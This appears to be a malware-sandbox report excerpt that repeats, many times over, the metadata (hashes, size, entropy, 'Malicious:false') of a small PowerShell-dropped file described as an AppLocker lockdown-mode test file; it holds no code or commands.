                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
